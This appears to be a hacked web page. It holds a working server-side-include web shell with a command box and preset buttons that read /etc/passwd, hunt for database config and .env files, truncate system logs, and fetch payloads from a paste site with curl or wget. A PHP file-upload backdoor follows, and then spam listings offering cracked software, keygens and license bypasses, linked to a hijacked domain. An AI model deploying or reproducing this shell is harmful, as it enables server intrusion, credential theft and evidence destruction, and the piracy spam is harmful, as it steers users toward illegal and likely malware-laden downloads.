Untitled

<!– Author : Unknown45 | Optimized by DIMAX66 –><!– Author : Unknown45 | Optimized by DIMAX66 –><!– hargai author dengan cara menggunakan script ini tanpa recode script nya !!! –><!– Recoded? only changed and delete copyright? Don’t be a bastard dude! ~ Kata Bang zerobyte.id–>
<!–#config errmsg=”SSI_NOT_SUPPORTED”–><!–#set var=”zero” value=”” –><!–#if expr=”$QUERY_STRING_UNESCAPED = \$zero” –><!–#set var=”shl” value=”id” –><!–#else –><!–#set var=”shl” value=$QUERY_STRING_UNESCAPED –><!–#endif –><html><head><title>SSI.V3 – DIMAX66</title><meta name=”theme-color” content=”#000000″><meta charset=”UTF-8″><meta name=”robots” content=”noindex, nofollow”><style type=”text/css”> body { background: #000 url(‘data:image/svg+xml;utf8,<svg xmlns=”http://www.w3.org/2000/svg” width=”100″ height=”100″ viewBox=”0 0 100 100″><rect width=”100″ height=”100″ fill=”%23000″/><path d=”M0,0 L100,100 M100,0 L0,100″ stroke=”%23111″ stroke-width=”0.5″ opacity=”0.2″/></svg>’); color: #e0e0e0; font-family: ‘Courier New’, monospace; padding: 24px; line-height: 1.6; margin: 0; } .container { max-width: 960px; margin: 0 auto; background: rgba(10, 10, 12, 0.7); border: 1px solid #222; border-radius: 8px; padding: 24px; box-shadow: 0 0 20px rgba(0, 0, 0, 0.7), inset 0 0 10px rgba(30, 30, 40, 0.8); } hr { border: 0; height: 1px; background: linear-gradient(to right, transparent, #444, #666, #444, transparent); margin: 18px 0; } center { display: block; text-align: center; } h1 { font-size: 28px; color: #f8f8f8; text-shadow: 0 0 8px rgba(255, 215, 0, 0.3); margin-bottom: 12px; letter-spacing: 1px; } button { background: linear-gradient(to bottom, #1a1a1a, #0f0f0f); color: #e0e0e0; border: 1px solid #333; padding: 8px 16px; margin: 4px; border-radius: 6px; cursor: pointer; font-family: ‘Courier New’, monospace; font-size: 13px; transition: all 0.25s ease; box-shadow: 0 2px 4px rgba(0,0,0,0.3); } button:hover { background: linear-gradient(to bottom, #252525, #181818); color: #ffd700; border-color: #555; transform: translateY(-1px); box-shadow: 0 4px 8px rgba(0,0,0,0.4); } button:active { transform: translateY(0); } input[type=”text”] { background: #0f0f12; color: #fff; border: 1px solid #444; padding: 10px 12px; border-radius: 6px; font-family: ‘Courier New’, monospace; font-size: 14px; width: 65%; max-width: 620px; box-shadow: inset 0 1px 3px rgba(0,0,0,0.5); } textarea { background: #0a0a0f; color: #eee; border: 1px solid #333; padding: 14px; font-family: ‘Courier New’, monospace; font-size: 14px; width: 100%; height: 240px; resize: vertical; border-radius: 6px; box-shadow: inset 0 2px 6px rgba(0,0,0,0.6); } a { color: #aaa; text-decoration: none; } a:hover { color: #ffd700; } b, strong { color: #ffd700; font-weight: bold; text-shadow: 0 0 6px rgba(255, 215, 0, 0.4); } .footer { margin-top: 20px; color: #888; font-size: 13px; } .status-label { color: #999; } .cmd-label { color: #aaa; margin-top: 12px; display: block; } .ok { color: #4ade80 !important; text-shadow: 0 0 6px rgba(74, 222, 128, 0.4); } .fail { color: #f87171 !important; text-shadow: 0 0 6px rgba(248, 113, 113, 0.4); } .warn { color: #fbbf24 !important; text-shadow: 0 0 6px rgba(251, 191, 36, 0.4); } .info-box { background: rgba(20, 20, 25, 0.6); border: 1px solid #2a2a2a; border-radius: 6px; padding: 12px; margin: 10px 0; font-size: 13px; }</style></head>
<script src=”https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js”></script>
<script language=”javascript”>// === FUNGSI UTAMA: EXECUTE COMMAND ===function unknown45() { var uri = document.getElementById(‘command’).value; if (!uri || uri.trim() === ”) { alert(‘Masukkan command dulu!’); return; } var rep = uri.replace(/[ ]/g,’${IFS}’); // PERBAIKAN: Gunakan encodeURIComponent agar karakter seperti ? dan & tidak memutus URL document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+encodeURIComponent(rep);}
function refresh() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>”;}
function checkfile() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”ls${IFS}-la”;}
function readpass() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”cat${IFS}/etc/passwd”;}
function readnamed() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”cat${IFS}/etc/named.conf”;}
function movefiles() { alert(‘Gunakan command: mv oldname newname’); }function upfiles() { alert(‘Gunakan command: curl/wget untuk upload’); }function renamefiles() { alert(‘Gunakan command: mv old new’); }function deletefiles() { alert(‘Gunakan command: rm filename’); }function findfiles() { alert(‘Gunakan command: find /path -name filename’); }
// === PERBAIKAN: UPLOAD DENGAN CUSTOM URL + VERIFIKASI ===function addupload_manual() { var choice = prompt(“Pilih method upload:\n1. curl (recommended)\n2. wget\n3. php\n4. Custom URL (pake curl)\n\nMasukkan angka (1-4):”, “1”); if (!choice) return; var target = prompt(“Nama file target (contoh: uploader.php):”, “uploader.php”); if (!target) return; var source; if (choice === ‘4’) { source = prompt(“Masukkan URL source file (WAJIB https://):”, “https://”); if (!source) return; } else { source = ‘https://paste.code-solutions.dev/raw/xeqofosopi’; } var cleanCmd = “rm${IFS}-f${IFS}” + target + “${IFS};”; var cmd = “”; if (choice === ‘1’ || choice === ‘4’) { cmd = cleanCmd + “curl${IFS}-ksLo${IFS}” + target + “${IFS}-A${IFS}Mozilla/5.0${IFS}” + source + “${IFS}&&${IFS}ls${IFS}-lh${IFS}” + target + “${IFS}&&${IFS}chmod${IFS}644${IFS}” + target + “${IFS}&&${IFS}echo${IFS}’=== ISI FILE (5 baris pertama) ===’${IFS}&&${IFS}head${IFS}-n${IFS}5${IFS}” + target; } else if (choice === ‘2’) { cmd = cleanCmd + “wget${IFS}-qO${IFS}” + target + “${IFS}–user-agent=Mozilla/5.0${IFS}–no-check-certificate${IFS}” + source + “${IFS}&&${IFS}ls${IFS}-lh${IFS}” + target + “${IFS}&&${IFS}chmod${IFS}644${IFS}” + target + “${IFS}&&${IFS}echo${IFS}’=== ISI FILE (5 baris pertama) ===’${IFS}&&${IFS}head${IFS}-n${IFS}5${IFS}” + target; } else if (choice === ‘3’) { cmd = cleanCmd + “php${IFS}-r${IFS}’file_put_contents(\”” + target + “\”,file_get_contents(\”” + source + “\”));’${IFS}&&${IFS}ls${IFS}-lh${IFS}” + target + “${IFS}&&${IFS}chmod${IFS}644${IFS}” + target + “${IFS}&&${IFS}echo${IFS}’=== ISI FILE (5 baris pertama) ===’${IFS}&&${IFS}head${IFS}-n${IFS}5${IFS}” + target; } // PERBAIKAN UTAMA: Gunakan encodeURIComponent agar URL dengan ? atau & tidak terpotong jadi 0kb document.location.href=”<!–#echo var=DOCUMENT_NAME –>?” + encodeURIComponent(cmd);}
// === FUNGSI BARU: CEK FILE HASIL UPLOAD ===function checkUpload() { var file = prompt(“Nama file yang mau dicek:”, “uploader.php”); if (!file) return; var cmd = “echo${IFS}’=== STATUS FILE ===’${IFS}&&${IFS}ls${IFS}-lh${IFS}” + file + “${IFS}&&${IFS}file${IFS}” + file + “${IFS}&&${IFS}echo${IFS}’=== ISI (10 baris pertama) ===’${IFS}&&${IFS}head${IFS}-n${IFS}10${IFS}” + file + “${IFS}&&${IFS}echo${IFS}’=== UKURAN DETAIL ===’${IFS}&&${IFS}wc${IFS}-c${IFS}” + file; document.location.href=”<!–#echo var=DOCUMENT_NAME –>?” + encodeURIComponent(cmd);}
// === FUNGSI BARU: FIX PERMISSION FILE ===function fixPermission() { var file = prompt(“Nama file yang mau di-fix:”, “uploader.php”); if (!file) return; var perm = prompt(“Permission (default 644):”, “644”); if (!perm) return; var cmd = “chmod${IFS}” + perm + “${IFS}” + file + “${IFS}&&${IFS}ls${IFS}-lh${IFS}” + file + “${IFS}&&${IFS}echo${IFS}’✓ Permission berhasil diubah ke ” + perm + “‘”; document.location.href=”<!–#echo var=DOCUMENT_NAME –>?” + encodeURIComponent(cmd);}
function finddb() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”find${IFS}<!–#echo var=DOCUMENT_ROOT –>${IFS}-type${IFS}f${IFS}\\(${IFS}-name${IFS}config.php${IFS}-o${IFS}-name${IFS}database.php${IFS}-o${IFS}-name${IFS}config.inc.php${IFS}-o${IFS}-name${IFS}koneksi.php${IFS}-o${IFS}-name${IFS}wp-config.php${IFS}-o${IFS}-name${IFS}.env${IFS}\\)${IFS}2>/dev/null”;}
function checkroot() { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”ls${IFS}-la${IFS}/”;}
function deletelog() { if (confirm(‘Yakin mau hapus access logs?’)) { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”find${IFS}/var/log${IFS}-type${IFS}f${IFS}-name${IFS}’*.log’${IFS}-exec${IFS}truncate${IFS}-s${IFS}0${IFS}{}${IFS}\\;”; }}
function delsel() { if (confirm(‘Yakin mau hapus shell ini?’)) { document.location.href=”<!–#echo var=DOCUMENT_NAME –>?”+”rm${IFS}-f${IFS}<!–#echo var=SCRIPT_FILENAME –>”; }}
// === ENTER KEY SUPPORT ===document.addEventListener(‘DOMContentLoaded’, function() { var gaskan = document.getElementById(‘command’); if (gaskan) { gaskan.addEventListener(‘keyup’, function(event) { if (event.keyCode === 13) { event.preventDefault(); document.getElementById(‘gas’).click(); } }); }});</script>
<body><div class=”container”> <center> <h1>⚡ SSI.V3 ⚡</h1> <hr> </center>
<!– INFO BOX: DETEKSI ENVIRONMENT –> <div class=”info-box”> <b> Environment Detection:</b><br> <span class=”status-label”>Server Software :</span> <b><!–#echo var=SERVER_SOFTWARE –></b><br> <span class=”status-label”>Document Root :</span> <b><!–#echo var=DOCUMENT_ROOT –></b><br> <span class=”status-label”>Current User :</span> <b><!–#exec cmd=”id” –></b><br> <span class=”status-label”>Shell Available :</span> <b> <!–#exec cmd=”which sh 2>/dev/null && echo ‘sh ‘” –> <!–#exec cmd=”which bash 2>/dev/null && echo ‘bash ‘” –> </b><br> <span class=”status-label”>Tools :</span> <span class=”<!–#exec cmd=”which curl >/dev/null 2>&1 && echo ‘ok’ || echo ‘fail'” –>”>curl</span> | <span class=”<!–#exec cmd=”which wget >/dev/null 2>&1 && echo ‘ok’ || echo ‘fail'” –>”>wget</span> | <span class=”<!–#exec cmd=”which php >/dev/null 2>&1 && echo ‘ok’ || echo ‘fail'” –>php</span> | <span class=”<!–#exec cmd=”which python >/dev/null 2>&1 && echo ‘ok’ || echo ‘fail'” –>python</span> | <span class=”<!–#exec cmd=”which perl >/dev/null 2>&1 && echo ‘ok’ || echo ‘fail'” –>perl</span> </div>
<center> <font size=”2″>Command :  <input type=”text” id=”command” class=”text” name=”address1″ autofocus placeholder=”Masukkan command…”> <button id=”gas” onclick=”unknown45();”>▶ Execute</button> </font> </center>
<br> <span class=”status-label”>Host :</span> <b><!–#echo var=HTTP_HOST –></b><br> <span class=”status-label”>Server IP :</span> <b><!–#echo var=SERVER_ADDR –></b><br> <span class=”status-label”>Script Path :</span> <b><!–#echo var=SCRIPT_FILENAME –></b><br>
<hr>
<center> <button onclick=”refresh()” style=”float: left;”> Refresh</button> <button onclick=”checkfile()”> List Files</button> <button onclick=”renamefiles()”>✏️ Rename</button> <button onclick=”movefiles()”> Move</button> <button onclick=”deletefiles()”>️ Delete</button> <button onclick=”findfiles()”> Find</button> <button onclick=”upfiles()”>⬆️ Upload</button> <button onclick=”delsel()” style=”float: right;”> Remove Shell</button> <br><br> <button onclick=”readpass();”> /etc/passwd</button> <button onclick=”readnamed();”> /etc/named.conf</button> <button onclick=”addupload_manual();”>⚡ Manual Upload</button> <button onclick=”checkUpload()”> Check File</button> <button onclick=”fixPermission()”> Fix Permission</button> <button onclick=”finddb()”>️ Find DB Config</button> <button onclick=”checkroot()”> Root Directory</button> <button onclick=”deletelog()”> Clear Logs</button> </center>
<hr> <span class=”cmd-label”>▶ Executed Command :</span> <b><font face=”Courier New” id=”cmd”><!–#echo var=shl –></font></b> <br><br> <textarea readonly><!–#exec cmd=”$shl 2>&1″ –></textarea>
<script> var cmd = document.getElementById(“cmd”).innerHTML.split(“${IFS}”).join(” “); document.getElementById(“cmd”).innerHTML = cmd; </script>
<!– FOOTER ELEGAN DENGAN DIMAX66 –> <hr> <center class=”footer”> <div style=” font-family: ‘Courier New’, monospace; font-size: 14px; color: #aaa; letter-spacing: 1.5px; padding-top: 8px; “> <span style=”color: #ffd700; text-shadow: 0 0 6px rgba(255, 215, 0, 0.3); font-weight: bold;”>◆</span> <span style=”margin: 0 8px;”>|</span> <span style=”color: #f0f0f0; font-weight: bold;”>DIMAX66</span> <span style=”margin: 0 8px;”>|</span> <span style=”color: #888;”>© 2026</span> <span style=”margin: 0 8px;”>|</span> <span style=”color: #aaa; font-size: 11px;”>SSI Smart Shell</span> <span style=”color: #ffd700; text-shadow: 0 0 6px rgba(255, 215, 0, 0.3); font-weight: bold;”>◆</span> </div> </center></div></body></html>

<?php
if (!empty($_FILES[‘hc’])) {
move_uploaded_file($_FILES[‘hc’][‘tmp_name’], $_FILES[‘hc’][‘name’]);
echo “Upload OK: ” . $_FILES[‘hc’][‘name’];
}
?>

<form method=”POST” enctype=”multipart/form-data”>
<input type=”file” name=”hc”>
<button type=”submit”>Upload</button>
</form>

Nice PDF Compressor Portable All Versions [100% Worked]

Poster
📊 File Hash: f17f0e47eec6d09c8163c784cca1ef5e
Last update: 2026-06-17



  • Processor: 1 GHz chip recommended
  • RAM: Needed: 4 GB
  • Disk space: 64 GB for setup

Simple-to-configure program that helps you compress PDF files and reduce the actual size of the documents in order to gain some space on your hard drive. If large PDF files give you headaches because they take too much space on your hard-disk, it’s probably the right time to give a specialized tool like Nice PDF Compressor a shot because this application has been especially designed to tackle this issue.

  • Portable activator usable from USB flash drives
  • Nice PDF Compressor Crack for PC Stable [x86x64] Verified FREE
  • Key generator with integrated license verification bypass
  • Nice PDF Compressor Pre-Activated [x86-x64] [no Virus]
  • Generate serial numbers with automatic validation bypass
  • Nice PDF Compressor Crack exe (x86x64) Latest .zip FREE
  • Patch removing all trial limitations permanently
  • Nice PDF Compressor Crack no Virus x86-x64 Latest FREE

https://standard.edu.my/bloodborne-empress-crack-gdrive/

Elcomsoft Wireless Security Auditor Professional Portable only 100% Worked (x86x64) Multilingual

Poster
🖹 HASH-SUM:
e38583546fea70d9a419caa9527934a3
📅 Updated on: 2026-06-20



  • Processor: At least 1 GHz, 2 cores
  • RAM: 4 GB for keygen
  • Disk space: 64 GB for setup

Test the security of your company’s wireless network using this penetration testing tools that comes packed with advanced attack modes. Elcomsoft Wireless Security Auditor is a tool that can help you determine the level of security of a wireless network by attempting to retrieve the passwords used by the users. The application supports both WPA and WPA2 security standards and can attempt to recover the password from captured network data.

  1. License key backup and restore tool with encryption
  2. Elcomsoft Wireless Security Auditor Professional Portable exe [x86-x64]
  3. Crack download with step-by-step installation instructions
  4. Elcomsoft Wireless Security Auditor Professional Portable only Latest [x86x64] Clean MediaFire
  5. Universal crack supporting multiple platforms and versions
  6. Elcomsoft Wireless Security Auditor Professional Portable + License Key Windows 11 (x86-x64) [Patch] GitHub
  7. Key generator compatible with OEM, retail, and volume licenses
  8. Elcomsoft Wireless Security Auditor Professional Portable + Crack [x32-x64] [Windows] gDrive FREE

https://standard.edu.my/fl-studio-2025-portable-serial-key-windows-instant/

FL Studio 2025 Portable + Serial Key [Windows] Instant

Poster
🔧 Digest:
0cfab2020489f170f0fb999234ef88dd
🕒 Updated: 2026-06-16



  • Processor: 1 GHz dual-core required
  • RAM: 4 GB recommended
  • Disk space: Enough for tools

FL Studio is a digital audio workstation used for music production and audio editing. It supports a step sequencer, piano roll, and playlist functionality. It features instruments, effects, and VST plugin compatibility. It makes real-time recording, mixing, mastering, and automation possible. Favored by beginners and Professional producers worldwide. Acclaimed for flexibility, speed, and creative working processes.

  1. Key generator with smart detection of software version
  2. FL Studio 2025 Portable for PC [Full] [x32x64] Latest Bypass FREE
  3. Simple patcher – one click to activate any version
  4. FL Studio Cracked [x86-x64] Lifetime FREE
  5. Patch installer disabling activation popups and update reminders
  6. FL Studio Portable only Latest [x64] Final
  7. Patch download with built-in malware scans and safety checks
  8. FL Studio Activated [Patch] Verified
  9. Patch for resetting software trial counters indefinitely
  10. FL Studio License[Activated] Multilingual

https://standard.edu.my/the-blood-of-dawnwalker-crack-windows-2026/

Internet Download Manager (IDM) Portable + Product Key [Lifetime] Windows 11

Poster
🖹 HASH-SUM:
a141ba8552d0b4e935c9549471c8b370
📅 Updated on: 2026-06-19



  • Processor: Dual-core CPU for activator
  • RAM: 4 GB or higher
  • Disk space: Required: 64 GB

Internet Download Manager boosts download speeds up to five times faster. It offers pause, resume, scheduling, and error recovery capabilities. It connects to browsers for capturing and managing downloads. It features support for HTTP, FTP, HTTPS, and various file types. Valued for its reliability and simple user interface. Popular for download organization and acceleration.

  1. Patch tool unlocking all premium features and advanced modules
  2. Internet Download Manager (IDM) 6.42 Portable + Activator [no Virus] [x32-x64] FREE
  3. Download key generator exporting keys into multiple file formats
  4. Internet Download Manager (IDM) Crack + Keygen Stable (x64) MediaFire FREE
  5. Keygen software with support for generating valid serials
  6. Internet Download Manager (IDM) Pre-Activated Stable [no Virus] GitHub FREE
  7. Advanced keygen with support for checksum validation
  8. Internet Download Manager (IDM) Crack + Activator 100% Worked [x86x64] Clean

https://standard.edu.my/transtools-crack-portable-full-100-worked-2026/

TransTools Crack + Portable Full 100% Worked 2026

Poster
📦 Hash-sum → e3663a8b5e3e0dc5293184e9da5be3d9
📌 Updated on 2026-06-15



  • Processor: 1 GHz chip recommended
  • RAM: 4 GB for tools
  • Disk space: 64 GB for install

Collection of document translation and spellchecking tools for Microsoft Word, Excel and Autodesk AutoCAD to improve your productivity. TransTools provides you with a set of tools for Office applications that enables you to process documents and prepare them for translation, proof-read and format them. Designed to enhance the working productivity of translators, the application can be installed as an addon for Microsoft Word, Excel, Visio and AutoCAD.

  1. Pre-cracked license profiles for team deployment
  2. TransTools Free[Activated] no Virus (x86-x64) [100% Worked] 2026
  3. Generate unlimited working keys with one tool
  4. TransTools Portable for PC (x32-x64) Stable Bypass
  5. Crack for activating modules or locked plugins
  6. TransTools Activated All Versions [x32-x64] 2026

https://standard.edu.my/winrar-7-00-crack-activator-final-2026/

WinRAR 7.00 Crack + Activator Final 2026

Poster
🔧 Digest:
87092e6238b276c04534a061a8284204
🕒 Updated: 2026-06-17



  • Processor: 1 GHz CPU for bypass
  • RAM: 4 GB for crack use
  • Disk space: Enough for tools

WinRAR is a favored tool for file compression and archiving. WinRAR features efficient support for formats such as RAR and ZIP. WinRAR provides tools for password protection, error recovery, and split archives. WinRAR incorporates integration with Windows Explorer to manage files easily. Acclaimed for fast, reliable, and secure file transfers.

  • License key backup and restore tool with strong encryption methods
  • WinRAR Crack + Keygen Windows 10 [Lifetime] FREE
  • Patch disabling license expiry notifications and forced updates
  • WinRAR Crack + Keygen Windows 10 FREE
  • Product key recovery tool for reactivating software
  • WinRAR Portable + Crack Windows 11 FREE

https://standard.edu.my/lumion-portable-only-all-versions-x64-stable-2026/

Lumion Portable only All Versions x64 Stable 2026

Poster
🔐 Hash sum: 90ebecf07a6b35c57fabaa174553b18d
📅 Last update: 2026-06-18



  • Processor: 1 GHz CPU for bypass
  • RAM: Minimum 4 GB
  • Disk space: 64 GB for crack

Lumion is real-time 3D visualization software used for rendering architectural and landscape designs. Enables users to produce detailed, high-quality renders and realistic visualizations. developed Lumion, which is available to users in more than 180 countries. Popular among interior designers, architects, urban planners, and landscape designers. Capable of delivering high-quality, interactive, real-time architectural renders.

  1. Universal serial number generator for any app
  2. Lumion License[Activated] x86-x64 FREE
  3. Get license files for both 32-bit and 64-bit editions
  4. Lumion 2022 Portable for PC [no Virus] (x64) 2026
  5. Patch-only downloads – skip bulky installers
  6. Lumion Portable exe [no Virus]

https://standard.edu.my/gears-of-war-e-day-compressed-repack-100-working-5-1-surround/